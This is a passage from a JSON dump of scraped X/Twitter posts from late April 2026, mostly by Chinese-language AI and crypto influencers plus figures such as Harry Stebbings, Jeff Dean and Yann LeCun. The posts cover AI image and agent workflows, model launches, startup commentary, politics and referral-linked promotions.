"呵呵,上个月我说雷总的模型会把价格打下来,一群人喷我懂个 p 的 AI ,今天满屏都是感谢雷总,天地良心,成年人的世界真的他妈的太现实了吧。", + "url": "https://x.com/CuiMao/status/2049369313547800804", + "published_at": "2026-04-29T06:04:54+00:00", + "source": "nitter" + }, + { + "handle": "lxfater", + "account": "@lxfater", + "name": "铁锤人", + "title": "用 GPT Image 2 赚钱,你想到几种方式?\n\n我整理了5种,每种都有提示词,拿走能用\n\n但还有一种方式不用自己会出图也能赚!!\n\n有人进货四分钱,卖两毛,自己一张图都不出\n\n闲鱼上已经有人在跑了\n\n其余 5 种看图\n\n完整提示词加自动化流程,请看引用文章👇", + "url": "https://x.com/lxfater/status/2049368609193926810", + "published_at": "2026-04-29T06:02:06+00:00", + "source": "nitter" + }, + { + "handle": "chuxiaeth", + "account": "@chuxiaeth", + "name": "初夏", + "title": "🧵 最近主攻各平台的嘴撸创作者赛道,不卷且能稳定产出收益。这波参与的是 @MindoAI 和 @useTria 的联合活动 🎯\n\n策略上我依然聚焦推文创作,辅以低磨损的轻交互。活动需要交易量和办卡,门槛确实比纯内容局高,但我不会去死磕资金堆量的维度,找准自己优势位最重要 📊\n\nTria交互链接:http://app.tria.so/?accessCode=3RPJYP7003&utm_source=mindo\n\n排名规则分三块:\n1️⃣ DEX 交易量\n2️⃣ 信用卡办理加消费\n3️⃣ 创作者影响力\n我的打法是主攻第三项,前两项用最小成本蹭基础分,集中火力打内容 💡\n\n这种活动本质是用内容换影响力再变现。不用每天盯着链上烧 Gas,也不用拼资金体量,持续输出好内容慢慢把排名做上去就行 ⚡ 而且 Tria 背靠 Hyperliquid 和 Aptos,近期上了永续合约和收益产品,Mindo 又是 AI 热点,两个合在一起创作素材很充裕,叙事空间够大 🎁\n\n建议想参与的创作者多结合产品最新动态做内容增量,交互上优先做一次操作长尾生效的任务,别分散精力去追全部。控制节奏,这个活动的长尾收益会比看起来更可观 👀", + "url": "https://x.com/chuxiaeth/status/2049351176433623539", + "published_at": "2026-04-29T04:52:50+00:00", + "source": "nitter" + }, + { + "handle": "dingyi", + "account": "@dingyi", + "name": "Ding", + "title": "我就知道🤣🤣🤣", + "url": "https://x.com/dingyi/status/2049335171066061234", + "published_at": "2026-04-29T03:49:14+00:00", + "source": "nitter" + }, + { + "handle": "lxfater", + "account": "@lxfater", + "name": "铁锤人", + "title": "R to @lxfater: 海报图片提示词 :\n\n请生成一张随机的瑜伽宣传海报拼贴总图。\n整体要求:\n在一张大画面中,随机分隔出 N 张彼此独立的瑜伽宣传海报\n每张卡面尺寸随机设计铺满整张图\n卡面之间用清晰的留白、细边框、拼贴切割线或杂志式分隔结构隔开\n整体像一次抽出了 N 张不同风格的高质量瑜伽宣传海报\n每张海报都要明显不同,具有\"随机抽卡\"的新鲜感和丰富变化\n所有海报统一保持高级、专业、吸引人,适合瑜伽课程宣传、社媒推广、品牌视觉展示\n\n分镜摆姿势提示词:将图一的女性改为图二的4,5姿势,生成图片\n\n视频提示词:根据首尾帧生成丝滑的,就是专业瑜伽演示的视频,要求运镜丝滑\n\n注册体验领积分👉https://flowith.io?inv=TIECHUIREN,喜欢的可以试试", + "url": "https://x.com/lxfater/status/2049329956153352499", + "published_at": "2026-04-29T03:28:30+00:00", + "source": "nitter" + }, + { + "handle": "lxfater", + "account": "@lxfater", + "name": "铁锤人", + "title": "R to @lxfater: 如何使用Agent 模式 3 步:\n\n选图像模式\n选GPT-2-image\n点 Agent 按钮\n\n利用下面给的提示词,出了分镜图和人设图\n\n接下来,利用分镜图和人设图,我们就可以控制人物动作啦!!\n\n如何做到呢?主要思路就是让摆出开始的瑜伽动作和结束的瑜伽动作(具体如图一所示)\n\n得出首帧和尾帧,直接喂给可灵视频模型,就出上面的视频了\n\n多个视频就可以出系列的瑜伽动作\n\nflowith的高级套餐包含 GPT Image 2 和 Nanobanana 2 flash 无限生成\n需要的可以使用下面链接,注册送积分:https://flowith.io?inv=TIECHUIREN\n\n图片和视频提示词都在下一条👇", + "url": "https://x.com/lxfater/status/2049329950495310198", + "published_at": "2026-04-29T03:28:29+00:00", + "source": "nitter" + }, + { + "handle": "lxfater", + "account": "@lxfater", + "name": "铁锤人", + "title": "做内容运营,生图生视频,你现在还在跑好几个工具吗?\n\n被朋友拉去做瑜伽图,搭了无数工作流\nGPT Image 2 出来后,发现全废了\n\n得重新规划一套,但这几天身体不舒服,没心思搞\n随手把提示词扔进 flowith 试了一下\n\n以为偷懒的结果会很烂,但实际上这个是我最近用的最好的生图agent之一。\n\n它直接出了 12 个瑜伽动作分镜,动作清晰,描述完整\n\n分镜图和人物图来生成出首末两张图片,用视频模式可灵模型,简单的演示视频,一条链路打通,全在一个工具里面\n\nAgent 模式还能联网,生成下周海报日历,日期星期都是对的,普通的生图模型记忆估计2025年\n\n这条链路怎么跑起来,看我下面细细说来👇", + "url": "https://x.com/lxfater/status/2049329944052859141", + "published_at": "2026-04-29T03:28:28+00:00", + "source": "nitter" + }, + { + "handle": "dingyi", + "account": "@dingyi", + "name": "Ding", + "title": "Ghostty 离开 GitHub,同一天 Warp 宣布开源。\n\nWarp 一直以来都很好用,但越来越臃肿,性能也差点意思,但对不会命令行的非程序员非常友好,这次开源可以说是一个重大转折点,没准半年后各种 Warp 变体都会出现了。\n\n还有,Warp 现在的垂直 tab 就比基于 Ghostty 的那些 Cmux 好用多了,期待未来出现更多好用的终端!", + "url": "https://x.com/dingyi/status/2049304499093946475", + "published_at": "2026-04-29T01:47:21+00:00", + "source": "nitter" + }, + { + "handle": "gkxspace", + "account": "@gkxspace", + "name": "余温", + "title": "R to @gkxspace: 大家的重点不应该放在“六个月”、“不需要人”\n\n技术的迭代速度很快,现在可以10个人变成5个,或许六个月、也或许一年后可能变成1个,直到完全不需要人来做各种重复性工作\n\n更应该关注的是找到自身的价值,在这波AI浪潮里有属于自己的独特性", + "url": "https://x.com/gkxspace/status/2049302176900501544", + "published_at": "2026-04-29T01:38:07+00:00", + "source": "nitter" + }, + { + "handle": "HarryStebbings", + "account": "@HarryStebbings", + "name": "Harry Stebbings", + "title": "\"SBC becomes a problem when stock prices fall and dilution explodes.\n\nWhat was 3% annual dilution can quickly become 10%, creating a downward spiral that is hard to escape.\n\nThe fix is to be far more selective, give equity to the top performers who drive value, and pay the rest in cash so you control dilution.\"\n\nTo what extent is SBC the crux of the problem and has it ever been a better time to be a founder or operator given this @honam @infoarbitrage @paulbonnet @markpinc", + "url": "https://x.com/HarryStebbings/status/2049298621951058341", + "published_at": "2026-04-29T01:24:00+00:00", + "source": "nitter" + }, + { + "handle": "ylecun", + "account": "@ylecun", + "name": "Yann LeCun", + "title": "RT by @ylecun: - Comey indicted for tweeting a number.\n- Trump FCC threatens ABC's broadcast license.\n- Trump defacing more govt institutions with his name and picture.\n- Trump's kids cashing in on huge govt contracts.\n\nI'm always torn on whether to speak up on the daily drumbeat of Trump's creepy, corrupt, Putin-style authoritarianism. \n\nOn the one hand, this has become so standard under Trump, and everyone's opinions on him have long hardened, so why bother? Just keep your head down, post on economic policy (what happened to Econ Twitter?), and don't be distracted by the daily news cycle outrages. That's the standard position in DC policy circles.\n\nOn the other hand, isn't this defeatist passivity how authoritarianism thrives? Government actions that would have induced a nationwide backlash 15 years ago are now just the day's background noise. So the bar moves.\n\nIt’s a familiar path: Most authoritarian nations moved there gradually yet persistently - the govt commits some outrages, waits for the public to get used to it and stop complaining, and then pushes for the next round. Authoritarian governments count on the population having a short attention span while they steadily boil the frog. But when you think about how far Trump has pushed just in the last 15 months, it’s fair to wonder where we'll be after the next 33 months of his term.\n\nSo I’ve been torn - speaking up a lot during the ICE protests, then just focusing on econ for many weeks. I don’t want to bore people who’ve all made up their minds on what is happening in this country - and I've been trying to spend less time on this toxic hellsite for my own mental health.\n\nBut I also think us trying to be all cool and above-the-fray is exactly what gives the administration the green light to once again push harder towards corrupt, statist, personality-cult Putinism. I don’t really have an answer here. Although this being Twitter, I’m sure that any possible approach (whether passive, hair-on-fire, or in-between) will inevitably get me yelled at here.", + "url": "https://x.com/ylecun/status/2049290206923382906", + "published_at": "2026-04-29T00:50:33+00:00", + "source": "nitter" + }, + { + "handle": "svwang1", + "account": "@svwang1", + "name": "王川(硅谷)", + "title": "旧金山湾区的地铁站花了九千万美元在入口处加了高高的门,这样逃票变得非常困难。不仅每年增加了一千万美元收入,而且地铁变得更加干净安全,之前要做的各种清理工作减少了 95%。\n\n和外界交往的过程中,增加各种严格的过滤筛选机制,是保护自己,提高效率的一个重要必备的措施。因为成本的原因而对外不设防,就是准备把自己变成垃圾场。", + "url": "https://x.com/svwang1/status/2049289806241550791", + "published_at": "2026-04-29T00:48:58+00:00", + "source": "nitter" + }, + { + "handle": "lxfater", + "account": "@lxfater", + "name": "铁锤人", + "title": "看来草莓问题和洗车问题很经典了,ChatGPT都在测试", + "url": "https://x.com/lxfater/status/2049278935897186512", + "published_at": "2026-04-29T00:05:46+00:00", + "source": "nitter" + }, + { + "handle": "HarryStebbings", + "account": "@HarryStebbings", + "name": "Harry Stebbings", + "title": "\"No, layoffs alone will not fix the problem.\n\nIf a company has become bloated, simply cutting 50% often just leaves you with half the same mediocrity.\n\nThe real issue is culture and talent quality, and fixing that usually requires a full rebuild, which is extremely hard, especially for public companies.\"\n\nDo you think that layoffs will solve the problem of many doing them @jasonlk @AnjneyMidha @GergelyOrosz @AustinGeorgas", + "url": "https://x.com/HarryStebbings/status/2049278741583643076", + "published_at": "2026-04-29T00:05:00+00:00", + "source": "nitter" + }, + { + "handle": "ylecun", + "account": "@ylecun", + "name": "Yann LeCun", + "title": "RT by @ylecun: \"World models\" has a technical meaning - the transition model/dynamics model from Bellman/Kalman in the context of MDPs/ state space approach to control theory ~ 1960. I gave a talk on this history https://www.youtube.com/watch?v=9B4kkaGOozA&t=3891s", + "url": "https://x.com/ylecun/status/2049272044504936685", + "published_at": "2026-04-28T23:38:23+00:00", + "source": "nitter" + }, + { + "handle": "dingyi", + "account": "@dingyi", + "name": "Ding", + "title": "我去有人知道这是哪位大神设计的吗?@FateTell 应该是今年看到的设计最精美又好玩的 iOS app 了 !算命 + AI 结合很有创意,细节打磨的也相当好。哪怕你对八字之前不感兴趣,我也建议下载一个把玩一下。看多了千篇一律 vibe 的产品,突然看到这个真的让人眼前一亮啊。\n\nhttps://fatetell.com/zh-CN/invite?referral=QQE5QT", + "url": "https://x.com/dingyi/status/2049262208241332358", + "published_at": "2026-04-28T22:59:18+00:00", + "source": "nitter" + }, + { + "handle": "HarryStebbings", + "account": "@HarryStebbings", + "name": "Harry Stebbings", + "title": "\"You cannot have only A players in every role, some functions are just there to keep the business running.\n\nBut you can build a team where the people you keep are the highest performers in those roles.\n\nA players thrive when surrounded by other strong performers, but they get dragged down in organizations full of B and C players.\"\n\nCan you have a team of only A players @Carles_Reina @rabois @bhalligan @GuptaRK22", + "url": "https://x.com/HarryStebbings/status/2049253323329704378", + "published_at": "2026-04-28T22:24:00+00:00", + "source": "nitter" + }, + { + "handle": "svwang1", + "account": "@svwang1", + "name": "王川(硅谷)", + "title": "人写的文章像面条,再乱,最终还是可以梳理出头绪。ai 写的文章像一锅粥,最后不知所云。", + "url": "https://x.com/svwang1/status/2049252535689757003", + "published_at": "2026-04-28T22:20:52+00:00", + "source": "nitter" + }, + { + "handle": "ylecun", + "account": "@ylecun", + "name": "Yann LeCun", + "title": "RT by @ylecun: What a week at @iclr_conf in Rio 🇧🇷 !\n\nAs my first conference, it would have been hard to ask for a better experience 😍. I had the chance to present two papers:\n- EB-JEPA https://github.com/facebookresearch/eb_jepa: Presented as an Oral 🏅 (top ~3% of papers) at the World Models workshop.\n- Dual Perspectives on non-Contrastive SSL https://arxiv.org/abs/2507.01028: Presented as a poster.\n-> I’m already working on two follow-ups to these, so stay tuned for more on that 😉\n\nI was genuinely impressed by the quality of the discussions during the poster sessions. A huge thanks to everyone who stopped by our poster to debate the details, and to those who attended the talk 🙏\nI’m leaving Rio with a lot of new research ideas and potential collaborations. This week really made my motivation to keep pushing papers and staying active in the community even stronger for the rest of my PhD 🚀\n\nAnother highlight was the socials, specifically the @amilabs mixer. It was exciting to see AMI’s first official public event go so well—it definitely felt like we put AMI “on the map” for a lot of people.\n\nThanks again to my co-authors 🙏:\n- EB-JEPA: @randall_balestr, @megdrv, @DavidJFan, @garridoq_, @TusharNagarajan, @koustuvsinha, @kevinghstz , Mike Rabbat, @ylecun, @_amirbar\n- Dual Perspectives on NC-SSL: Jean Ponce, @MichaelArbel, Martial Hebert", + "url": "https://x.com/ylecun/status/2049241361266684288", + "published_at": "2026-04-28T21:36:28+00:00", + "source": "nitter" + }, + { + "handle": "HarryStebbings", + "account": "@HarryStebbings", + "name": "Harry Stebbings", + "title": "I am worried by the constraining exit options for venture backed companies: \n\n1. IPOs: You can’t IPO with less than $500M in revenue and even then, it’s not a slam dunk. Everyone that has so far has been a s*** IPO. \n\n2. Acquisition by Incumbent: Yes but they are so specific. Very specialised in what they want. Not nearly big enough demand side for the supply of venture backed companies. \n\n3. Private Equity: More closed than ever. Thoma, Francisco, Clearlake are on a portfolio of zombies that will likely follow the same fate as Medallia. Will cause them to pull back significantly from SaaS M&A. \n\nThis is not good.", + "url": "https://x.com/HarryStebbings/status/2049237538901020767", + "published_at": "2026-04-28T21:21:16+00:00", + "source": "nitter" + }, + { + "handle": "HarryStebbings", + "account": "@HarryStebbings", + "name": "Harry Stebbings", + "title": "Do the majority of company teams need to be rebuilt for the technology we have today?\n\n\"Yes, teams need to be rebuilt for the AI era.\n\nIf roles are going to be automated or not adapting fast enough, you have to redesign the org from scratch based on what is possible today.\n\nThe companies that win will rebuild with AI in mind, not layer it onto old structures.\"\n\nWhat role does not exist today but will be common in 5 years time @karrisaarinen @benioff @levie @dharmesh", + "url": "https://x.com/HarryStebbings/status/2049224886128722345", + "published_at": "2026-04-28T20:31:00+00:00", + "source": "nitter" + }, + { + "handle": "JeffDean", + "account": "@JeffDean", + "name": "Jeff Dean", + "title": "Google Translate is turning 20! 🎉. There are 20 fun facts and tips in the thread below.\n\nTranslate is one of my favorite Google products because it brings us all closer together!\n\nI've been involved with a couple of things over the years. The first was our deployment of the initial system in 2006, which provided a huge leap forward in quality because it used a much larger 5-gram language model trained on trillions of words of text (indeed, probably the first trillion token language model training in the world: paper has some nice heads showing scaling-law-like quality improvement from scaling to more data/compute).\n\nSee \"Large Language Models in Machine Translation\", Thorsten Brants, Ashok C. Popat, Peng Xu, Franz J. Och and Jeffrey Dean, https://aclanthology.org/D07-1090/\n\nThe second major collaboration was in 2016 when we moved Translate over from a statistical machine translation approach to using deep neural networks.  This approach relied on two key innovations.  The first was Google's work on Sequence-to-Sequence models (https://arxiv.org/abs/1409.3215).  The second was our development of TPUs, custom cups that improved the performance of inference for deep neural networks by 30-80X over existing CPUs and GPUs of the day (and reduced latency by 15-30X).  This made launching compute-intensive language model services like Translate feasible for hundreds of millions of users. See \"In-Datacenter Performance Analysis of a Tensor Processing Unit\",  Norman P. Jouppi et al.  https://arxiv.org/abs/1704.04760\n\nGNMT paper:\n\"Google's Neural Machine Translation System: Bridging the Gap between Human and Machine Translation\",  Yonghui Wu, Mike Schuster, Zhifeng Chen, Quoc V. Le, Mohammad Norouzi, Wolfgang Macherey, Maxim Krikun, Yuan Cao, Qin Gao, Klaus Macherey, Jeff Klingner, Apurva Shah, Melvin Johnson, Xiaobing Liu, Łukasz Kaiser, Stephan Gouws, Yoshikiyo Kato, Taku Kudo, Hideto Kazawa, Keith Stevens, George Kurian, Nishant Patil, Wei Wang, Cliff Young, Jason Smith, Jason Riesa, Alex Rudnick, Oriol Vinyals, Greg Corrado, Macduff Hughes, and Jeffrey Dean, https://arxiv.org/abs/1609.08144\n\nMost recently, we have advanced Translate further using Gemini models.\n\nEach of these advances relied on research that have major quality leaps over the existing status quo translation approaches, bringing better quality and connectedness to all of our Translate users! 🎉", + "url": "https://x.com/JeffDean/status/2049221200321380805", + "published_at": "2026-04-28T20:16:21+00:00", + "source": "nitter" + }, + { + "handle": "CuiMao", + "account": "@CuiMao", + "name": "CuiMao", + "title": "干爹发新模型了!\n属于Nemotron 3 系列中的多模态版本。可以文本、图像、视频、音频的统一理解与推理,专为Agentic AI设计,特别适合给多模态感知子代理用,我来试试给Hermes用用看,", + "url": "https://x.com/CuiMao/status/2049198015232315465", + "published_at": "2026-04-28T18:44:13+00:00", + "source": "nitter" + }, + { + "handle": "dingyi", + "account": "@dingyi", + "name": "Ding", + "title": "So good!", + "url": "https://x.com/dingyi/status/2049171494329065493", + "published_at": "2026-04-28T16:58:50+00:00", + "source": "nitter" + }, + { + "handle": "frxiaobei", + "account": "@frxiaobei", + "name": "凡人小北", + "title": "我现在基本不太直接用 Agent了。\n介绍下我的AI 搭档,Finn。\n现在大部分情况是 Finn 让 Agent 去干活。\n\n工作流其实挺简单的:\n我现在会现在 Codex (之前是 Claude Code) 里把一个 Agent 或者 skill 调好,跑到稳定。\n\n然后直接丢给 OpenClaw,后面基本就不太管了\n\n这一步挺关键的。\n\n不然你会发现一个很烦的事情:\n你要跟一堆 Agent 来回对话,有时候都找不到有那个 MD 的文件夹在哪,很快就乱了。\n\n换了这种模式后我现在基本只做一件事:提需求\n\n剩下的 Finn 自己去搞,他会先跟我确认好需求,就安排其他 Agent 去干了。\n\n而且我已经把一整套东西接进来了,Obsidian、Google Workspace、iCloud、飞书、github、Cloudflare 等,各种表格和自动化流程。\n\n如果你还在一个个 Agent 聊天,其实有一个悖论,以为自己在用 AI,但本质上只是换了一套更聪明的工具。\n\n安全我也跑了一段时间,我现在的做法挺克制的:白名单 + 审计 + 能力边界,不给乱权限,主要让它长期跑那些稳定的事情。\n\n目前看,是稳的。\n\n有一个很直观的变化,这套东西一旦跑顺了,真的很难再回去什么都自己聊自己盯。\n\n比如最近我用 Codex 对好了将近一年的烂账,然后形成了一个固定的 skill 交给了 OpenClaw,现在跟他说一句,就能把所有的表填的明明白白,还能在固定时间盘点,发邮件。\n所以 Finn 现在是我的私人助理,财务总监,技术总监等角色集大成者。", + "url": "https://x.com/frxiaobei/status/2049170782170042513", + "published_at": "2026-04-28T16:56:00+00:00", + "source": "nitter" + }, + { + "handle": "dingyi", + "account": "@dingyi", + "name": "Ding", + "title": "最喜欢的硅谷科技公司之一 Poolside 发布模型了!他们的网站设计简直是艺术品。\n\nhttps://poolside.ai/", + "url": "https://x.com/dingyi/status/2049166818452160778", + "published_at": "2026-04-28T16:40:15+00:00", + "source": "nitter" + }, + { + "handle": "frxiaobei", + "account": "@frxiaobei", + "name": "凡人小北", + "title": "现在远程面试可以更干脆了。\n\n面试官当甲方出需求,\n应聘者打开 Codex / Claude Code,\n直接共享屏幕开始干。\n\n半小时什么都看清了。", + "url": "https://x.com/frxiaobei/status/2049158565487935850", + "published_at": "2026-04-28T16:07:28+00:00", + "source": "nitter" + }, + { + "handle": "AravSrinivas", + "account": "@AravSrinivas", + "name": "Aravind Srinivas", + "title": "RT by @AravSrinivas: Today we’re rolling out a new native Comet experience for iPad.\n\nComet now works naturally with iPadOS features like multiple windows and Split View, so you can work with Comet alongside the apps you already use.\n\nAvailable now on the App Store.", + "url": "https://x.com/AravSrinivas/status/2049157990604025896", + "published_at": "2026-04-28T16:05:11+00:00", + "source": "nitter" + }, + { + "handle": "frxiaobei", + "account": "@frxiaobei", + "name": "凡人小北", + "title": "雷老板是懂营销的,\n\n本着拿人 token,替人带货的原则,\n\n替 Xiaomi MiMo 喊个话。", + "url": "https://x.com/frxiaobei/status/2049155099071750164", + "published_at": "2026-04-28T15:53:41+00:00", + "source": "nitter" + }, + { + "handle": "AravSrinivas", + "account": "@AravSrinivas", + "name": "Aravind Srinivas", + "title": "R to @AravSrinivas: reddit.com/r/GeminiAI/commen…", + "url": "https://x.com/AravSrinivas/status/2049151356985040934", + "published_at": "2026-04-28T15:38:49+00:00", + "source": "nitter" + }, + { + "handle": "AravSrinivas", + "account": "@AravSrinivas", + "name": "Aravind Srinivas", + "title": "A Google Earth + Flight Simulator, fully cooked by Perplexity Computer with Codex/CC as subagents inside it. GTA vibes.", + "url": "https://x.com/AravSrinivas/status/2049151268606894310", + "published_at": "2026-04-28T15:38:28+00:00", + "source": "nitter" + }, + { + "handle": "dingyi", + "account": "@dingyi", + "name": "Ding", + "title": "周末刚说完 Cursor 很聪明,小米马上就学会了。免费给一个月会员,也没几个钱,不管谁申请都秒过,相当于请所有网友免费宣传,万一还有不少人忘了关掉自动续费,反而还赚了🤣\n\n我感觉以后所有模型厂商都学会这招了,再也没有他们的商单了。。。", + "url": "https://x.com/dingyi/status/2049143565260042558", + "published_at": "2026-04-28T15:07:51+00:00", + "source": "nitter" + }, + { + "handle": "gkxspace", + "account": "@gkxspace", + "name": "余温", + "title": "刚看了郭宇的访谈,提到六个月之后或许就不需要人再工作了,知识工作者应该享受这仅有的六个月。\n\n我并不觉得这是危言耸听,因为按照目前这个阶段,整个发展其实不难看出来。\n\nClaude Code、Skills、OpenClaw,不都在向全自动化发展。\n如果再有一次大的模型迭代,下一个颠覆性的产品出现,或许知识工作者的工作真的能完全被 AI 取代。\n\n现在 AI Coding 的能力已经非常非常强了,你做出一个产品做出来后,完全可以让 AI 直接一键去复刻。\n\n用户想用什么产品,自己就一句话做出来了,那我们现在很多人去做的产品又有多少意义呢?\n\n甚至说现在很多产品其实不如一个 Skills,如果我能用一个 Skills 解决那为什么要用你的产品?", + "url": "https://x.com/gkxspace/status/2049136483106230523", + "published_at": "2026-04-28T14:39:43+00:00", + "source": "nitter" + }, + { + "handle": "CuiMao", + "account": "@CuiMao", + "name": "CuiMao", + "title": "50000🎉🎉", + "url": "https://x.com/CuiMao/status/2049128032661852434", + "published_at": "2026-04-28T14:06:08+00:00", + "source": "nitter" + }, + { + "handle": "CuiMao", + "account": "@CuiMao", + "name": "CuiMao", + "title": "如果你的claude里面要接deepseek v4 pro,effort一定要拉到max才有效果。官方文档里说的。也挺好,反正这几天四舍五入等于不要钱。", + "url": "https://x.com/CuiMao/status/2049127261409034535", + "published_at": "2026-04-28T14:03:04+00:00", + "source": "nitter" + }, + { + "handle": "frxiaobei", + "account": "@frxiaobei", + "name": "凡人小北", + "title": "图像类产品现在分两派:\n把单次生成做到极致,和把整个视觉工作流跑通。\n\nflowith 明显是后者,还顺手把视频给 seedance 出来了。\n\n关键是底层就是 image2,而且不止这一个模型。\n\n不管底层怎么换,上层工作流都很稳。\n单点极致 + 工作流闭环,两派合一。\n\n对我这种普通用户非常有价值。", + "url": "https://x.com/frxiaobei/status/2049121762009632774", + "published_at": "2026-04-28T13:41:13+00:00", + "source": "nitter" + }, + { + "handle": "lxfater", + "account": "@lxfater", + "name": "铁锤人", + "title": "Flowith出 GPT image 的生图Agent,真快呀\n\n我赶紧试试,看看如何!!", + "url": "https://x.com/lxfater/status/2049119209502670864", + "published_at": "2026-04-28T13:31:04+00:00", + "source": "nitter" + }, + { + "handle": "soumithchintala", + "account": "@soumithchintala", + "name": "Soumith Chintala", + "title": "Test of Time LLM from some legends...pretty fun!", + "url": "https://x.com/soumithchintala/status/2049117783447785523", + "published_at": "2026-04-28T13:25:24+00:00", + "source": "nitter" + }, + { + "handle": "dingyi", + "account": "@dingyi", + "name": "Ding", + "title": "之前买过 ZenMux 速度还是挺快的, 算是 OpenRouter alternative 吧。咱也不是很懂,感觉既然能上 OpenCode 的第三方列表,说明还是比较正规和靠谱的吧?\n\n目前 DeepSeek V4 限时免费体验:https://zenmux.ai/invite/RUR17S", + "url": "https://x.com/dingyi/status/2049096050158551248", + "published_at": "2026-04-28T11:59:03+00:00", + "source": "nitter" + }, + { + "handle": "paulg", + "account": "@paulg", + "name": "Paul Graham", + "title": "RT by @paulg: 🧵 THREAD\n\n1/ Online age verification is the hill to die on.\n\nNot a fight you can sit out. Not a battle you can skip. Not a policy you can afford to ignore while you focus on something else.\n\nThis is it. This is the line. This is the infrastructure that enables every other piece of the digital control grid.\n\nIf we lose this fight, we lose everything.", + "url": "https://x.com/paulg/status/2049088498163216560", + "published_at": "2026-04-28T11:29:02+00:00", + "source": "nitter" + }, + { + "handle": "gkxspace", + "account": "@gkxspace", + "name": "余温", + "title": "这个 Codex 教程很不错,新手值得一看。\n\n作者一个人演示并行推进 6 个项目:iOS App、React 落地页、Remotion 视频、投资人 Deck、移动端设计稿、Twitter 自动发帖。\n\n5 个有用的技巧:\n\n①Codex 是一个 AI 代理调度中心:编码、文档、浏览器、计算机控制全在一个界面里。你可以同时给多个 AI 代理下指令。\n\n②插件是别人给你的能力,skills是你自己造的能力。遇到重复流程,用 /skill creator 让 AI 帮你封装成可复用技能。\n\n③自动化只需要一句话,如:\"把这个任务每周五下午4点跑一次\"。日历周报、YouTube 数据分析、Twitter 发帖,全部自动。\n\n④Codex 的设计能力是短板。解法是在 Codex 终端里直接跑 Claude Code,让它处理视觉密集型任务。Codex 调度,Claude 出活,各取所长。\n\n⑤Steer 功能让你在 AI 工作途中实时注入修正指令,不用等它跑完再改。Fork 功能让你从一个已有大量上下文的聊天分叉出新任务,不用重复描述背景。\n\n⑥从 Anthropic 的 http://claude.ai/design 里提取设计工具的工作逻辑,直接移植到 Codex 变成自己的技能。跨平台能力迁移。\n\nhttps://x.com/Saccc_c/status/2048629684792098966/video/1", + "url": "https://x.com/gkxspace/status/2049083226463797284", + "published_at": "2026-04-28T11:08:05+00:00", + "source": "nitter" + }, + { + "handle": "gkxspace", + "account": "@gkxspace", + "name": "余温", + "title": "我的 mac 的工作区,这几个都是必不可缺,看来大家差不多,还有没安装的快装一下:\n\n1. Obsidian:用来做内容存档、搭建个人知识库\n2. cc-swtich:管理多个 CLI 工具,管理多家模型供应商\n3. Codex :最近更新很频繁,体验也越来越好,而且不封号\n4. Ghostty:一个非常丝滑的终端,推荐~\n5. 闪电说 + Typless:前者非结构化,后者结构化,配合使用很爽\n6. V2rayN:更加必不可少了,大家都懂", + "url": "https://x.com/gkxspace/status/2049072666385006919", + "published_at": "2026-04-28T10:26:08+00:00", + "source": "nitter" + }, + { + "handle": "0xAA_Science", + "account": "@0xAA_Science", + "name": "0xAA", + "title": "央视报道了 “渔猎齐哥” Up主,真牛逼啊。\n监督环境保护,吾辈义不容辞!", + "url": "https://x.com/0xAA_Science/status/2049072268165497033", + "published_at": "2026-04-28T10:24:33+00:00", + "source": "nitter" + }, + { + "handle": "chuxiaeth", + "account": "@chuxiaeth", + "name": "初夏", + "title": "Pinned: 04年女大,在美国。元气少女,活力满满,Web3菜鸟,希望多向各位大佬学习。", + "url": "https://x.com/chuxiaeth/status/2049048148660965739", + "published_at": "2026-04-28T08:48:42+00:00", + "source": "nitter" + }, + { + "handle": "chuxiaeth", + "account": "@chuxiaeth", + "name": "初夏", + "title": "开始上 >@TermMaxFi 了,是不是有些晚了,按照网上的教程,每天来签到,再写一篇推特的帖子,拿MP空投积分。\n#TermMax 是 DeFi 固定利率借贷与循环借贷策略类的项目。预计今年Q2发币。", + "url": "https://x.com/chuxiaeth/status/2049045566857064461", + "published_at": "2026-04-28T08:38:27+00:00", + "source": "nitter" + }, + { + "handle": "chuxiaeth", + "account": "@chuxiaeth", + "name": "初夏", + "title": "R to @chuxiaeth: 比特币橙子哥的推是 @oragnes 原推有误", + "url": "https://x.com/chuxiaeth/status/2049043685094907944", + "published_at": "2026-04-28T08:30:58+00:00", + "source": "nitter" + }, + { + "handle": "bozhou_ai", + "account": "@bozhou_ai", + "name": "泊舟", + "title": "RT by @bozhou_ai: 《Cursor 官方扶持的 AI & Web3 创作者名录》\n\n@cursor_ai 作为顶尖的 AI 项目,最近筛选了 15 位中文区优质博主,给予了价值一万美元的 Token 激励。如果深入了解这个圈子的行情,就会知道这份名单的分量确实不低。\n\n以下是这 15 位获得资助的创作者及其核心画像(顺序随机):\n\n1. Jason Zhu @GoSailGlobal 独立开发者,主要分享 SaaS 出海经验与 AI 资讯,并搭建了一个聚合各类 Agent 技能的资源站点。\n\n2. 0xAA @0xAA_Science 毕业于北大计算机系,博士学历,同时也是 Web3 开源教育平台 WTF Academy 的发起人。\n\n3. 泊舟 @bozhou_ai 拥有 2.1 万粉丝的 AI 博主,既是 AI 程序员也是氛围编程的践行者,重点构建各类智能体与提示词方案。\n\n初夏 @chuxiaeth 这里斗胆把我也加入,一个努力学习AI的小卡拉米。\n\n4. Ding @dingyi 产品设计师出身,掌管着 SaasPick、TopFeed 等多个独立产品,全网积累了约 15 万的关注者。\n\n5. 雪踏乌云 @Pluvio9yte 供职于大厂的开发者,主要输出氛围编程、AI 编程技巧以及产品出海方面的实操经验。\n\n6. 奶昔 @realNyarime Naixi Networks 的创办者,核心精力聚焦在 eSIM 技术与奶昔社区的运营上。\n\n7. 杀破狼 @wolfyxbt 深耕 Meme 币赛道,热衷于氛围编程与链上数据拆解,表达方式风趣且一针见血。\n\n8. 凡人小北 @frxiaobei 身兼商业与战略顾问,致力于 AI 战略咨询,长期扎根在真实商业场景中推动 AIGC 项目的落地应用。\n\n9. Leo @runes_leo AI 与 Crypto 的独立建设者,符文堂社区的发起人,深入钻研比特币生态体系与链上量化策略。\n\n10. 铁锤人 @lxfater AI 领域博主,善于借助 AI 赋能创业历程,在 GitHub 上维护着一个斩获 3 万星标的热门项目。\n\n11. 比特币橙子 @oranges 资深比特币玩家与加密投资人,对 AI 和氛围编程抱有极高热情,亲手搭建了集成多种 AI 智能体的工具集 OwlClawHub。\n\n12. Steven Lynn @Stv_Lynn 既是科技播客 FirstLabAI 的主持人,也是线下活动 Crazy Saturday 的发起与主办者。\n\n13. Berryxia @berryxia 热衷于打造各类 AI 工具并精研系统级提示词,对设计美学与提示词分享抱有极大热忱。\n\n14. 余温 @gkxspace 05 年出生的连续创业者,年纪虽轻但经验丰富,专注于 AI 产品从 0 到 